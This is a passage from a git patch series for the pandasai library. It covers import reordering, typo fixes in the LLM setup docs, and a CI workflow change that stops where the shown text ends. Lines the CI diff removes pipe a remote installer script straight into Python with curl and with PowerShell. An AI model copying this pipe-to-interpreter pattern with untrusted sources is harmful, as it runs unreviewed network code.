diff --git a/pandasai/core/prompts/__init__.py b/pandasai/core/prompts/__init__.py
index 9fcb903a0..27f00f60d 100644
--- a/pandasai/core/prompts/__init__.py
+++ b/pandasai/core/prompts/__init__.py
@@ -1,15 +1,18 @@
from __future__ import annotations
+
from typing import TYPE_CHECKING
+
from pandasai.core.prompts.correct_execute_sql_query_usage_error_prompt import (
CorrectExecuteSQLQueryUsageErrorPrompt,
)
from pandasai.core.prompts.correct_output_type_error_prompt import (
CorrectOutputTypeErrorPrompt,
)
-from .generate_python_code_with_sql import GeneratePythonCodeWithSQLPrompt
+
from .base import BasePrompt
from .correct_error_prompt import CorrectErrorPrompt
from .generate_python_code import GeneratePythonCodePrompt
+from .generate_python_code_with_sql import GeneratePythonCodeWithSQLPrompt
if TYPE_CHECKING:
from pandasai.agent.state import AgentState
diff --git a/pandasai/core/prompts/base.py b/pandasai/core/prompts/base.py
index b2c43bcb2..d49f7d6ca 100644
--- a/pandasai/core/prompts/base.py
+++ b/pandasai/core/prompts/base.py
@@ -4,11 +4,11 @@
import os
import re
+from abc import ABC, abstractmethod
from pathlib import Path
from typing import Optional
from jinja2 import Environment, FileSystemLoader
-from abc import ABC, abstractmethod
class BasePrompt:
diff --git a/pandasai/core/response/base.py b/pandasai/core/response/base.py
index d6232019c..64ff402ac 100644
--- a/pandasai/core/response/base.py
+++ b/pandasai/core/response/base.py
@@ -1,9 +1,12 @@
import re
+
import numpy as np
import pandas as pd
-from .response_types import Chart, DataFrame, Number, String
+
from pandasai.exceptions import InvalidOutputValueMismatch
+from .response_types import Chart, DataFrame, Number, String
+
class ResponseParser:
def parse(self, result: dict):
diff --git a/pandasai/core/user_query.py b/pandasai/core/user_query.py
index 2dcf3979e..6a96b41dd 100644
--- a/pandasai/core/user_query.py
+++ b/pandasai/core/user_query.py
@@ -1,4 +1,5 @@
import re
+
from pandasai.exceptions import MaliciousQueryError
diff --git a/pandasai/data_loader/loader.py b/pandasai/data_loader/loader.py
index 39734486e..bcc63cb41 100644
--- a/pandasai/data_loader/loader.py
+++ b/pandasai/data_loader/loader.py
@@ -1,18 +1,20 @@
import copy
+import hashlib
+import importlib
import os
-import yaml
-import pandas as pd
from datetime import datetime, timedelta
-import hashlib
+from typing import Any
+
+import pandas as pd
+import yaml
from pandasai.dataframe.base import DataFrame
from pandasai.dataframe.virtual_dataframe import VirtualDataFrame
from pandasai.exceptions import InvalidDataSourceType
from pandasai.helpers.path import find_project_root
-import importlib
-from typing import Any
-from .query_builder import QueryBuilder
+
from ..constants import SUPPORTED_SOURCES
+from .query_builder import QueryBuilder
class DatasetLoader:
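The loader's new imports (`hashlib`, `datetime`/`timedelta`) are the usual ingredients for content-addressed cache files with a freshness window. A generic sketch of that pattern, with hypothetical helper names rather than `DatasetLoader`'s actual methods:

```python
# Illustrative cache helpers: a stable key per query plus a time-based check.
import hashlib
from datetime import datetime, timedelta

def cache_key(query: str) -> str:
    # Hash the query so the cache filename is stable and filesystem-safe.
    return hashlib.sha256(query.encode("utf-8")).hexdigest()[:16]

def is_fresh(written_at: datetime, ttl: timedelta = timedelta(hours=1)) -> bool:
    # A cached result is reusable only while it is younger than the TTL.
    return datetime.now() - written_at < ttl
```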
diff --git a/pandasai/data_loader/query_builder.py b/pandasai/data_loader/query_builder.py
index 317bd7aeb..188353067 100644
--- a/pandasai/data_loader/query_builder.py
+++ b/pandasai/data_loader/query_builder.py
@@ -1,4 +1,4 @@
-from typing import Dict, Any, List, Union
+from typing import Any, Dict, List, Union
class QueryBuilder:
diff --git a/pandasai/dataframe/__init__.py b/pandasai/dataframe/__init__.py
index 3fb3e08ef..eb6993036 100644
--- a/pandasai/dataframe/__init__.py
+++ b/pandasai/dataframe/__init__.py
@@ -1,5 +1,4 @@
from .base import DataFrame
from .virtual_dataframe import VirtualDataFrame
-
__all__ = ["DataFrame", "VirtualDataFrame"]
diff --git a/pandasai/dataframe/base.py b/pandasai/dataframe/base.py
index c2ecd980b..3d73d7c14 100644
--- a/pandasai/dataframe/base.py
+++ b/pandasai/dataframe/base.py
@@ -1,16 +1,17 @@
from __future__ import annotations
-from io import BytesIO
+
+import hashlib
import os
import re
+from io import BytesIO
+from typing import TYPE_CHECKING, ClassVar, Dict, List, Optional, Union
from zipfile import ZipFile
-import pandas as pd
-from typing import TYPE_CHECKING, List, Optional, Union, Dict, ClassVar
+import pandas as pd
import yaml
-
+import pandasai as pai
from pandasai.config import Config
-import hashlib
from pandasai.exceptions import DatasetNotFound, PandasAIApiKeyError
from pandasai.helpers.dataframe_serializer import (
DataframeSerializer,
@@ -18,8 +19,6 @@
)
from pandasai.helpers.path import find_project_root
from pandasai.helpers.request import get_pandaai_session
-import pandasai as pai
-
if TYPE_CHECKING:
from pandasai.agent.base import Agent
@@ -102,7 +101,7 @@ def chat(self, prompt: str, config: Optional[Union[dict, Config]] = None) -> str
if self._agent is None:
from pandasai.agent import (
Agent,
- ) # Import here to avoid circular import
+ )
self._agent = Agent([self], config=self.config)
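The hunk above drops the explanatory comment but keeps the deferred import itself. For readers skimming the diff, a hypothetical sketch of that pattern — the class name is a stand-in; only the import placement matters:

```python
# Deferred-import sketch: the agent module also imports the dataframe module,
# so importing Agent at call time instead of load time breaks the cycle.

class DataFrameLike:
    """Stand-in for pandasai's DataFrame; illustrative only."""

    def __init__(self):
        self._agent = None

    def chat(self, prompt: str):
        if self._agent is None:
            # Imported here, on first use, to avoid a circular import.
            from pandasai.agent import Agent
            self._agent = Agent([self])
        return self._agent.chat(prompt)
```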
diff --git a/pandasai/dataframe/query_builder.py b/pandasai/dataframe/query_builder.py
index 8bc8c1e50..dfb0bb615 100644
--- a/pandasai/dataframe/query_builder.py
+++ b/pandasai/dataframe/query_builder.py
@@ -1,4 +1,4 @@
-from typing import Dict, Any, List, Union
+from typing import Any, Dict, List, Union
class QueryBuilder:
diff --git a/pandasai/dataframe/virtual_dataframe.py b/pandasai/dataframe/virtual_dataframe.py
index 84b40df4d..1476290e1 100644
--- a/pandasai/dataframe/virtual_dataframe.py
+++ b/pandasai/dataframe/virtual_dataframe.py
@@ -1,6 +1,9 @@
from __future__ import annotations
+
from typing import TYPE_CHECKING, ClassVar
+
import pandas as pd
+
from pandasai.dataframe.base import DataFrame
if TYPE_CHECKING:
diff --git a/pandasai/helpers/data_sampler.py b/pandasai/helpers/data_sampler.py
index 02fca788a..f8f7a956c 100644
--- a/pandasai/helpers/data_sampler.py
+++ b/pandasai/helpers/data_sampler.py
@@ -10,7 +10,6 @@
import random
import numpy as np
-
import pandas as pd
from .anonymizer import Anonymizer
diff --git a/pandasai/helpers/from_google_sheets.py b/pandasai/helpers/from_google_sheets.py
index caab43a7f..f702347af 100644
--- a/pandasai/helpers/from_google_sheets.py
+++ b/pandasai/helpers/from_google_sheets.py
@@ -1,8 +1,7 @@
import re
-import requests
-
import pandas as pd
+import requests
def get_google_sheet(src) -> list:
diff --git a/pandasai/helpers/logger.py b/pandasai/helpers/logger.py
index d234eb72c..b5f2893dc 100644
--- a/pandasai/helpers/logger.py
+++ b/pandasai/helpers/logger.py
@@ -22,9 +22,10 @@
import time
from typing import List
-from pandasai.helpers.telemetry import scarf_analytics
from pydantic import BaseModel
+from pandasai.helpers.telemetry import scarf_analytics
+
from .path import find_closest
diff --git a/pandasai/helpers/output_validator.py b/pandasai/helpers/output_validator.py
index 98a7309f2..05e8e0d9e 100644
--- a/pandasai/helpers/output_validator.py
+++ b/pandasai/helpers/output_validator.py
@@ -2,8 +2,8 @@
from typing import Any, Iterable
import numpy as np
-
import pandas as pd
+
from pandasai.exceptions import InvalidOutputValueMismatch
diff --git a/pandasai/helpers/request.py b/pandasai/helpers/request.py
index a16ea266c..66b17e293 100644
--- a/pandasai/helpers/request.py
+++ b/pandasai/helpers/request.py
@@ -5,10 +5,10 @@
from urllib.parse import urljoin
import requests
+from dotenv import load_dotenv
from pandasai.exceptions import PandasAIApiCallError, PandasAIApiKeyError
from pandasai.helpers.logger import Logger
-from dotenv import load_dotenv
load_dotenv()
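`load_dotenv()` runs at import time, so any local `.env` file is merged into the process environment before the request helpers read credentials. A minimal sketch of the pattern:

```python
# Module-level dotenv loading: .env values become environment variables.
import os
from dotenv import load_dotenv

load_dotenv()  # reads a .env file from the working directory, if present

api_key = os.environ.get("PANDASAI_API_KEY")  # None if set nowhere
```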
diff --git a/pandasai/llm/bamboo_llm.py b/pandasai/llm/bamboo_llm.py
index 0484141e5..a867c54dc 100644
--- a/pandasai/llm/bamboo_llm.py
+++ b/pandasai/llm/bamboo_llm.py
@@ -1,6 +1,6 @@
from __future__ import annotations
-from typing import TYPE_CHECKING, Optional
+from typing import TYPE_CHECKING, Optional
if TYPE_CHECKING:
from pandasai.core.prompts.base import BasePrompt
diff --git a/pandasai/smart_dataframe/__init__.py b/pandasai/smart_dataframe/__init__.py
index 046608616..80a68bfb3 100644
--- a/pandasai/smart_dataframe/__init__.py
+++ b/pandasai/smart_dataframe/__init__.py
@@ -1,13 +1,16 @@
import uuid
+import warnings
from functools import cached_property
from io import StringIO
from typing import Any, List, Optional, Union
-import warnings
+
import pandas as pd
+
from pandasai.agent import Agent
from pandasai.dataframe.base import DataFrame
-from ..helpers.logger import Logger
+
from ..config import Config
+from ..helpers.logger import Logger
class SmartDataframe:
diff --git a/pandasai/smart_datalake/__init__.py b/pandasai/smart_datalake/__init__.py
index 1d1a90937..aae12092e 100644
--- a/pandasai/smart_datalake/__init__.py
+++ b/pandasai/smart_datalake/__init__.py
@@ -1,11 +1,14 @@
import uuid
import warnings
-import pandas as pd
from typing import List, Optional, Union
+
+import pandas as pd
+
from pandasai.agent import Agent
from pandasai.dataframe.base import DataFrame
-from ..helpers.cache import Cache
+
from ..config import Config
+from ..helpers.cache import Cache
class SmartDatalake:
diff --git a/tests/unit_tests/agent/test_agent.py b/tests/unit_tests/agent/test_agent.py
index 632a68e5f..8223c8ca7 100644
--- a/tests/unit_tests/agent/test_agent.py
+++ b/tests/unit_tests/agent/test_agent.py
@@ -7,10 +7,10 @@
from pandasai.agent.base import Agent
from pandasai.core.prompts.base import BasePrompt
-from pandasai.llm.fake import FakeLLM
-from pandasai.helpers.dataframe_serializer import DataframeSerializerType
from pandasai.dataframe.base import DataFrame
from pandasai.exceptions import MaliciousQueryError
+from pandasai.helpers.dataframe_serializer import DataframeSerializerType
+from pandasai.llm.fake import FakeLLM
class TestAgent:
diff --git a/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py b/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py
index 9c945b983..6d191f22f 100644
--- a/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py
+++ b/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py
@@ -1,4 +1,5 @@
import unittest
+
from pandasai.core.code_execution.safe_libs.base_restricted_module import (
BaseRestrictedModule,
SecurityError,
diff --git a/tests/unit_tests/core/code_execution/test_code_execution.py b/tests/unit_tests/core/code_execution/test_code_execution.py
index 2981795df..9628aae86 100644
--- a/tests/unit_tests/core/code_execution/test_code_execution.py
+++ b/tests/unit_tests/core/code_execution/test_code_execution.py
@@ -1,8 +1,9 @@
+import ast
import unittest
from unittest.mock import MagicMock
-import ast
-from pandasai.core.code_execution.code_executor import CodeExecutor
+
from pandasai.config import Config
+from pandasai.core.code_execution.code_executor import CodeExecutor
from pandasai.exceptions import NoResultFoundError
diff --git a/tests/unit_tests/core/code_execution/test_environment.py b/tests/unit_tests/core/code_execution/test_environment.py
index 6d4624f90..b16b6b353 100644
--- a/tests/unit_tests/core/code_execution/test_environment.py
+++ b/tests/unit_tests/core/code_execution/test_environment.py
@@ -1,9 +1,10 @@
import unittest
-from unittest.mock import patch, MagicMock
+from unittest.mock import MagicMock, patch
+
from pandasai.core.code_execution.environment import (
get_environment,
- import_dependency,
get_version,
+ import_dependency,
)
from pandasai.core.code_execution.safe_libs.restricted_pandas import RestrictedPandas
diff --git a/tests/unit_tests/core/code_generation/test_code_cleaning.py b/tests/unit_tests/core/code_generation/test_code_cleaning.py
index 0bb433d03..d324ce777 100644
--- a/tests/unit_tests/core/code_generation/test_code_cleaning.py
+++ b/tests/unit_tests/core/code_generation/test_code_cleaning.py
@@ -1,10 +1,11 @@
+import ast
import unittest
from unittest.mock import MagicMock
-import ast
-from pandasai.core.code_generation.code_cleaning import CodeCleaner
+
from pandasai.agent.state import AgentState
-from pandasai.exceptions import BadImportError, MaliciousQueryError
+from pandasai.core.code_generation.code_cleaning import CodeCleaner
from pandasai.dataframe.base import DataFrame
+from pandasai.exceptions import BadImportError, MaliciousQueryError
class TestCodeCleaner(unittest.TestCase):
diff --git a/tests/unit_tests/core/code_generation/test_code_security.py b/tests/unit_tests/core/code_generation/test_code_security.py
index a34c56477..9f362975c 100644
--- a/tests/unit_tests/core/code_generation/test_code_security.py
+++ b/tests/unit_tests/core/code_generation/test_code_security.py
@@ -1,7 +1,8 @@
import unittest
from unittest.mock import MagicMock
-from pandasai.core.code_generation.code_security import CodeSecurityChecker
+
from pandasai.agent.state import AgentState
+from pandasai.core.code_generation.code_security import CodeSecurityChecker
from pandasai.exceptions import MaliciousCodeGenerated
diff --git a/tests/unit_tests/core/code_generation/test_code_validation.py b/tests/unit_tests/core/code_generation/test_code_validation.py
index 469efd695..1ba164542 100644
--- a/tests/unit_tests/core/code_generation/test_code_validation.py
+++ b/tests/unit_tests/core/code_generation/test_code_validation.py
@@ -1,8 +1,8 @@
import unittest
from unittest.mock import MagicMock
-import ast
-from pandasai.core.code_generation.code_validation import CodeRequirementValidator
+
from pandasai.agent.state import AgentState
+from pandasai.core.code_generation.code_validation import CodeRequirementValidator
from pandasai.exceptions import ExecuteSQLQueryNotUsed
diff --git a/tests/unit_tests/core/prompts/test_prompts.py b/tests/unit_tests/core/prompts/test_prompts.py
index 2ad31d953..e3497cd65 100644
--- a/tests/unit_tests/core/prompts/test_prompts.py
+++ b/tests/unit_tests/core/prompts/test_prompts.py
@@ -1,5 +1,7 @@
import unittest
from unittest.mock import MagicMock
+
+from pandasai.agent.state import AgentState
from pandasai.core.prompts import (
get_chat_prompt,
get_chat_prompt_for_sql,
@@ -7,7 +9,6 @@
get_correct_error_prompt_for_sql,
get_correct_output_type_error_prompt,
)
-from pandasai.agent.state import AgentState
from pandasai.core.prompts.base import BasePrompt
from pandasai.core.prompts.correct_error_prompt import CorrectErrorPrompt
from pandasai.core.prompts.correct_execute_sql_query_usage_error_prompt import (
diff --git a/tests/unit_tests/dataframe/test_dataframe.py b/tests/unit_tests/dataframe/test_dataframe.py
index 810d9b956..ff0e5f39f 100644
--- a/tests/unit_tests/dataframe/test_dataframe.py
+++ b/tests/unit_tests/dataframe/test_dataframe.py
@@ -1,9 +1,11 @@
-import pytest
-import pandas as pd
from unittest.mock import Mock, patch
-from pandasai.dataframe.base import DataFrame
-from pandasai.agent import Agent
+
+import pandas as pd
+import pytest
+
import pandasai
+from pandasai.agent import Agent
+from pandasai.dataframe.base import DataFrame
class TestDataFrame:
diff --git a/tests/unit_tests/dataframe/test_loader.py b/tests/unit_tests/dataframe/test_loader.py
index 4bb1b1591..c0165a720 100644
--- a/tests/unit_tests/dataframe/test_loader.py
+++ b/tests/unit_tests/dataframe/test_loader.py
@@ -1,9 +1,11 @@
-import pytest
-from unittest.mock import patch, mock_open
+from datetime import datetime, timedelta
+from unittest.mock import mock_open, patch
+
import pandas as pd
-from pandasai.dataframe.base import DataFrame
+import pytest
+
from pandasai.data_loader.loader import DatasetLoader
-from datetime import datetime, timedelta
+from pandasai.dataframe.base import DataFrame
class TestDatasetLoader:
diff --git a/tests/unit_tests/dataframe/test_query_builder.py b/tests/unit_tests/dataframe/test_query_builder.py
index 431d4a52a..9dc977b54 100644
--- a/tests/unit_tests/dataframe/test_query_builder.py
+++ b/tests/unit_tests/dataframe/test_query_builder.py
@@ -1,4 +1,5 @@
import pytest
+
from pandasai.data_loader.query_builder import QueryBuilder
diff --git a/tests/unit_tests/helpers/test_file_importer.py b/tests/unit_tests/helpers/test_file_importer.py
index be0c7357b..c5a59ba89 100644
--- a/tests/unit_tests/helpers/test_file_importer.py
+++ b/tests/unit_tests/helpers/test_file_importer.py
@@ -2,9 +2,9 @@
Unit tests for the FileImporter class
"""
+import pandas as pd
import pytest
-import pandas as pd
from pandasai.helpers.file_importer import FileImporter
diff --git a/tests/unit_tests/helpers/test_responses.py b/tests/unit_tests/helpers/test_responses.py
index bf4337421..8b9af48c9 100644
--- a/tests/unit_tests/helpers/test_responses.py
+++ b/tests/unit_tests/helpers/test_responses.py
@@ -1,8 +1,10 @@
import unittest
-from pandasai.exceptions import InvalidOutputValueMismatch
+
+import pandas as pd
+
from pandasai.core.response.base import ResponseParser
from pandasai.core.response.response_types import Chart, DataFrame, Number, String
-import pandas as pd
+from pandasai.exceptions import InvalidOutputValueMismatch
class TestResponseParser(unittest.TestCase):
diff --git a/tests/unit_tests/llms/test_bamboo_llm.py b/tests/unit_tests/llms/test_bamboo_llm.py
index 6feff2b9f..e721d8870 100644
--- a/tests/unit_tests/llms/test_bamboo_llm.py
+++ b/tests/unit_tests/llms/test_bamboo_llm.py
@@ -1,9 +1,9 @@
import unittest
from unittest.mock import MagicMock, patch
+from pandasai.core.prompts.base import BasePrompt
from pandasai.exceptions import PandasAIApiCallError
from pandasai.llm.bamboo_llm import BambooLLM
-from pandasai.core.prompts.base import BasePrompt
class MockHttpResponse:
diff --git a/tests/unit_tests/prompts/test_correct_error_prompt.py b/tests/unit_tests/prompts/test_correct_error_prompt.py
index 648f189a0..7ac72e520 100644
--- a/tests/unit_tests/prompts/test_correct_error_prompt.py
+++ b/tests/unit_tests/prompts/test_correct_error_prompt.py
@@ -3,10 +3,10 @@
import sys
from pandasai import Agent
+from pandasai.core.prompts.correct_error_prompt import CorrectErrorPrompt
from pandasai.dataframe.base import DataFrame
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
from pandasai.llm.fake import FakeLLM
-from pandasai.core.prompts.correct_error_prompt import CorrectErrorPrompt
class TestCorrectErrorPrompt:
diff --git a/tests/unit_tests/prompts/test_generate_python_code_prompt.py b/tests/unit_tests/prompts/test_generate_python_code_prompt.py
index a1e630d5e..72e03b592 100644
--- a/tests/unit_tests/prompts/test_generate_python_code_prompt.py
+++ b/tests/unit_tests/prompts/test_generate_python_code_prompt.py
@@ -7,10 +7,10 @@
import pytest
from pandasai import Agent
+from pandasai.core.prompts.generate_python_code import GeneratePythonCodePrompt
from pandasai.dataframe.base import DataFrame
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
from pandasai.llm.fake import FakeLLM
-from pandasai.core.prompts.generate_python_code import GeneratePythonCodePrompt
class TestGeneratePythonCodePrompt:
diff --git a/tests/unit_tests/prompts/test_sql_prompt.py b/tests/unit_tests/prompts/test_sql_prompt.py
index bceee84bc..2e184983c 100644
--- a/tests/unit_tests/prompts/test_sql_prompt.py
+++ b/tests/unit_tests/prompts/test_sql_prompt.py
@@ -3,15 +3,14 @@
import os
import sys
-import pandasai as pai
import pytest
+import pandasai as pai
from pandasai import Agent
-from pandasai.helpers.dataframe_serializer import DataframeSerializerType
-from pandasai.llm.fake import FakeLLM
from pandasai.core.prompts.generate_python_code_with_sql import (
GeneratePythonCodeWithSQLPrompt,
)
+from pandasai.llm.fake import FakeLLM
class TestGeneratePythonCodeWithSQLPrompt:
diff --git a/tests/unit_tests/test_file_importer.py b/tests/unit_tests/test_file_importer.py
index be0c7357b..c5a59ba89 100644
--- a/tests/unit_tests/test_file_importer.py
+++ b/tests/unit_tests/test_file_importer.py
@@ -2,9 +2,9 @@
Unit tests for the FileImporter class
"""
+import pandas as pd
import pytest
-import pandas as pd
from pandasai.helpers.file_importer import FileImporter
diff --git a/tests/unit_tests/test_pandasai_init.py b/tests/unit_tests/test_pandasai_init.py
index 472de1618..a69ebf052 100644
--- a/tests/unit_tests/test_pandasai_init.py
+++ b/tests/unit_tests/test_pandasai_init.py
@@ -1,6 +1,7 @@
-import pandas
+from unittest.mock import MagicMock, patch
+
import pytest
-from unittest.mock import patch, MagicMock
+
import pandasai
from pandasai.dataframe.base import DataFrame
from pandasai.exceptions import DatasetNotFound, PandasAIApiKeyError
@@ -99,7 +100,7 @@ def test_load_dataset_not_found(self, mockenviron, mock_bytes_io, mock_zip_file)
dataset_path = "org/dataset_name"
- with pytest.raises(DatasetNotFound) as cm:
+ with pytest.raises(DatasetNotFound):
pandasai.load(dataset_path)
@patch("pandasai.os.path.exists")
From 07ce3cc587ec04aba9c6eb4d112fdcf62f4fbc03 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:47:34 +0100
Subject: [PATCH 27/58] fix: ruff errors
---
examples/dataframe.py | 1 +
examples/judge_agent.py | 3 ++-
examples/security_agent.py | 3 ++-
examples/table_relations.py | 5 +++--
4 files changed, 8 insertions(+), 4 deletions(-)
diff --git a/examples/dataframe.py b/examples/dataframe.py
index a61f04dbe..9e404886c 100644
--- a/examples/dataframe.py
+++ b/examples/dataframe.py
@@ -1,4 +1,5 @@
import os
+
import pandasai as pai
# Create a sample pandas DataFrame
diff --git a/examples/judge_agent.py b/examples/judge_agent.py
index 1c4decaef..473a08834 100644
--- a/examples/judge_agent.py
+++ b/examples/judge_agent.py
@@ -1,8 +1,9 @@
import os
+from pandasai_openai import OpenAI
+
from pandasai.agent.agent import Agent
from pandasai.ee.agents.judge_agent import JudgeAgent
-from pandasai_openai import OpenAI
os.environ["PANDASAI_API_KEY"] = "$2a****************************"
diff --git a/examples/security_agent.py b/examples/security_agent.py
index 0e3074db7..192141f33 100644
--- a/examples/security_agent.py
+++ b/examples/security_agent.py
@@ -1,8 +1,9 @@
import os
+from pandasai_openai import OpenAI
+
from pandasai.agent.agent import Agent
from pandasai.ee.agents.advanced_security_agent import AdvancedSecurityAgent
-from pandasai_openai import OpenAI
os.environ["PANDASAI_API_KEY"] = "$2a****************************"
diff --git a/examples/table_relations.py b/examples/table_relations.py
index 726ac8eff..33112ac7e 100644
--- a/examples/table_relations.py
+++ b/examples/table_relations.py
@@ -1,7 +1,8 @@
-from pandasai.agent.base import Agent
+from pandasai_openai import OpenAI
from pandasai_sql.sql import PostgreSQLConnector
+
+from pandasai.agent.base import Agent
from pandasai.ee.connectors.relations import ForeignKey, PrimaryKey
-from pandasai_openai import OpenAI
llm = OpenAI("sk-*************")
From b5e6a589ad5a936960529e197ab9482fd18476bd Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:50:25 +0100
Subject: [PATCH 28/58] fix: typos
---
docs/v3/large-language-models.mdx | 36 +++++++++++++++++++++++--------
pandasai/agent/base.py | 2 +-
2 files changed, 28 insertions(+), 10 deletions(-)
diff --git a/docs/v3/large-language-models.mdx b/docs/v3/large-language-models.mdx
index b890aac15..270fd9768 100644
--- a/docs/v3/large-language-models.mdx
+++ b/docs/v3/large-language-models.mdx
@@ -1,13 +1,12 @@
---
-title: 'Set up LLM'
-description: 'Set up Large Language Model in PandaAI'
+title: "Set up LLM"
+description: "Set up Large Language Model in PandaAI"
---
PandaAI supports multiple LLMs.
-To make the library lightweight, the default LLM is BambooLLM, developed by PandaAI team themselves.
+To make the library lightweight, the default LLM is BambooLLM, developed by the PandaAI team itself.
To use other LLMs, you need to install the corresponding LLM extension. Once an LLM extension is installed, you can configure it simply using `pai.config.set()`.
-Then, everytime you use the `.chat()` method, it will use the configured LLM.
-
+Then, every time you use the `.chat()` method, it will use the configured LLM.
## BambooLLM
@@ -25,6 +24,7 @@ os.environ["PANDASAI_API_KEY"] = "YOUR_API_KEY"
## OpenAI models
Install the pandasai-openai extension:
+
```bash
# Using poetry
poetry add pandasai-openai
@@ -32,10 +32,12 @@ poetry add pandasai-openai
# Using pip
pip install pandasai-openai
```
+
In order to use OpenAI models, you need to have an OpenAI API key. You can get one here.
Once you have an API key, you can use it to instantiate an OpenAI object:
Configure OpenAI:
+
```python
import pandasai as pai
from pandasai_openai import OpenAI
@@ -45,9 +47,11 @@ llm = OpenAI(api_token="my-openai-api-key")
# Set your OpenAI API key
pai.config.set({"llm": llm})
```
+
### Azure OpenAI models
Install the pandasai-openai extension:
+
```bash
# Using poetry
poetry add pandasai-openai
@@ -60,6 +64,7 @@ In order to use Azure OpenAI models, you need to have an Azure OpenAI API key. Y
Once you have an API key, you can use it to instantiate an Azure OpenAI object:
Configure Azure OpenAI:
+
```python
import pandasai as pai
from pandasai_openai import AzureOpenAI
@@ -71,10 +76,10 @@ llm = AzureOpenAI(api_base="https://.openai.azure.com/",
pai.config.set({"llm": llm})
```
-
## Google models
Install the extension:
+
```bash
# Using poetry
poetry add pandasai-google
@@ -84,6 +89,7 @@ pip install pandasai-google
```
### Google Gemini
+
In order to use Google PaLM models, you need to have a Google Cloud API key. You can get one here.
Once you have an API key, you can use it to instantiate a Google PaLM object:
@@ -97,6 +103,7 @@ pai.config.set({"llm": llm})
```
### Google VertexAI
+
In order to use Google models through Vertexai api, you need to have
Google Cloud Project
@@ -105,6 +112,7 @@ In order to use Google models through Vertexai api, you need to have
Authentication of gcloud
Once you have the basic setup, you can use it to instantiate a Google PaLM model through Vertex AI:
+
```python
import pandasai as pai
from pandasai_google import GoogleVertexAI
@@ -121,8 +129,8 @@ pai.config.set({"llm": llm})
In order to use HuggingFace models via text-generation, you need to first serve a supported large language model (LLM). Read the text-generation docs for more on how to set up an inference server.
This can be used, for example, to use models like LLaMa2, CodeLLaMa, etc. You can find more information about text-generation here.
-
Install the extension:
+
```bash
# Using poetry
poetry add pandasai-huggingface
@@ -132,6 +140,7 @@ pip install pandasai-huggingface
```
The inference_server_url is the only required parameter to instantiate a HuggingFaceTextGen model.
+
```python
import pandasai as pai
from pandasai_huggingface import HuggingFaceTextGen
@@ -141,9 +150,10 @@ llm = HuggingFaceTextGen(inference_server_url="http://127.0.0.1:8080")
pai.config.set({"llm": llm})
```
-## LangChain models
+## LangChain models
Install the extension:
+
```bash
# Using poetry
poetry add pandasai-langchain
@@ -153,6 +163,7 @@ pip install pandasai-langchain
```
Configure LangChain:
+
```python
import pandasai as pai
from pandasai_langchain import LangchainLLM
@@ -167,6 +178,7 @@ pai.config.set({"llm": llm })
In order to use Amazon Bedrock models, you need to have an AWS access key and secret key (AKSK) and be granted access to the model.
Install the extension:
+
```bash
# Using poetry
poetry add pandasai-bedrock
@@ -176,6 +188,7 @@ pip install pandasai-bedrock
```
Configure AWS Bedrock:
+
```python
import pandasai as pai
from pandasai_bedrock import BedrockClaude
@@ -199,7 +212,9 @@ llm = BedrockClaude(bedrock_runtime_client)
pai.config.set({"llm": llm })
```
+
## IBM models
+
In order to use IBM watsonx.ai models, you need to have
IBM Cloud api key
@@ -209,6 +224,7 @@ In order to use IBM watsonx.ai models, you need to have
The API key can be created in IBM Cloud. The project ID can be determined after a Watson Studio service is provisioned in IBM Cloud. The ID can then be found in the project’s Manage tab (Project -> Manage -> General -> Details). The service URL depends on the region of the provisioned service instance and can be found here.
Install the extension:
+
```bash
# Using poetry
poetry add pandasai-ibm
@@ -218,6 +234,7 @@ pip install pandasai-ibm
```
Configure IBM Watson:
+
```python
import pandasai as pai
from pandasai_ibm import IBMwatsonx
@@ -242,6 +259,7 @@ poetry add pandasai-local
# Using pip
pip install pandasai-local
```
+
### Ollama
Ollama’s compatibility is experimental (see docs).
@@ -325,4 +343,4 @@ As mentioned in the documentation ([OpenAI Seed](https://platform.openai.com/doc
### Workarounds and Future Updates
For AzureOpenAI Users: Rely on `temperature=0` for reducing randomness. Stay tuned for future updates as we work towards integrating seed functionality with AzureOpenAI.
-For OpenAI Users: Utilize both `temperature=0` and seed for maximum determinism.
\ No newline at end of file
+For OpenAI Users: Utilize both `temperature=0` and seed for maximum determinism.
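A hedged sketch of that advice, assuming the OpenAI extension forwards `temperature` and `seed` to the underlying API — check the extension's own docs for the exact parameter names:

```python
import pandasai as pai
from pandasai_openai import OpenAI

# temperature=0 minimizes sampling randomness; seed pins the remaining
# nondeterminism on OpenAI models that support it (values are placeholders).
llm = OpenAI(api_token="my-openai-api-key", temperature=0, seed=26)
pai.config.set({"llm": llm})
```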
diff --git a/pandasai/agent/base.py b/pandasai/agent/base.py
index 30f802fe0..401600002 100644
--- a/pandasai/agent/base.py
+++ b/pandasai/agent/base.py
@@ -105,7 +105,7 @@ def __init__(
# Initialize Code Generator
self._code_generator = CodeGenerator(self._state)
- # Initialze Response Generator
+ # Initialize Response Generator
self._response_parser = ResponseParser()
def chat(self, query: str, output_type: Optional[str] = None):
From ffe986c7860e914a95d207d2c17aa6d2d3251703 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:56:13 +0100
Subject: [PATCH 29/58] fix ci yml file
---
.github/workflows/ci.yml | 59 ++++++++++++++++++++++------------------
1 file changed, 32 insertions(+), 27 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 3c7ee268c..ddbd72e3a 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1,4 +1,4 @@
-name: ci
+name: CI
on:
push:
@@ -15,28 +15,31 @@ jobs:
steps:
- uses: actions/checkout@v3
+
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
- - name: Install Poetry (Unix)
- if: matrix.os != 'windows-latest'
- run: |
- curl -sSL https://install.python-poetry.org | python3 -
- echo 'export PATH="$HOME/.local/bin:$PATH"' >> $GITHUB_ENV
- - name: Install Poetry (Windows)
- if: matrix.os == 'windows-latest'
+
+ - name: Install Poetry
run: |
- (Invoke-WebRequest -Uri https://install.python-poetry.org -UseBasicParsing).Content | python -
